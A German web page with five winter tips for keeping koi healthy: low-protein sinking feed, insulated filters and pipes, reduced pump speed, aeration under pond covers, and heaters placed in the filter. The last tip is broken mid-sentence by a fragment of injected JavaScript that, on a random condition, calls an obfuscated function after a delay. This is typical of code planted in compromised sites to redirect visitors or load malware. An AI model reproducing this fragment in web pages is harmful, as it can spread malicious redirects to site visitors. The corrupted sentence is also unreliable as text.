Wintertipps

Fünf Tipps, die ihre Fische gut durch den Winter bringen

 

  • Füttern Sie ihre Koi, solange Sie das Futter problemlos aufnehmen. Verwenden Sie kurz vor dem Winter ein Sinkfutter mit geringem Proteingehalt. Richten Sie sich nicht nach irgendwelchen Temperaturangaben, unter denen die Koi nicht mehr gefüttert werden sollen. Die Koi stellen irgendwann selbst das Fressen ein.
  • Achten Sie darauf, dass der Filter und sämtliche Schläuche und Rohre gut isoliert sind, damit das Wasser darin nicht zu stark abkühlt, oder gefriert. Schalten Sie ausserdem, falls gegeben, den Wasserfall aus um ein Abkühlen des Wassers zu verhindern.
  • Nach Möglichkeit sollte der Filter durchlaufen. Reduzieren Sie aber die Geschwindigkeit der Pumpen, damit eine zu hohe Wasserumwälzung vermieden wird. Sollten Sie den Filter nicht durchlaufen lassen wollen, füttern Sie nach dessen Abschaltung nicht mehr.
  • Wenn Sie ihre Teichoberfläche mit Styrodur oder Folie abdecken, müssen Sie für eine ausreichende Belüftung im Teich sorgen, sonst ersticken ihre Fische. Ideal für diese Zwecke ist eine Sauerstoffplatte. Die beste Isolierung erreichen Sie, wenn zwischen der Wasseroberfläche und der Isolierung ein Luftpolster entsteht.
  • Regelmässige Wasserwechsel erwärmen ungeheizte Teiche. Bei kleineren seichteren Teichen, empfiehlt sich ein Heizstab. Installieren Sie diesen im Filter und nicht im Teich, da er dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dort effektiver arbeitet.

 

Beispiel Winterabdeckungen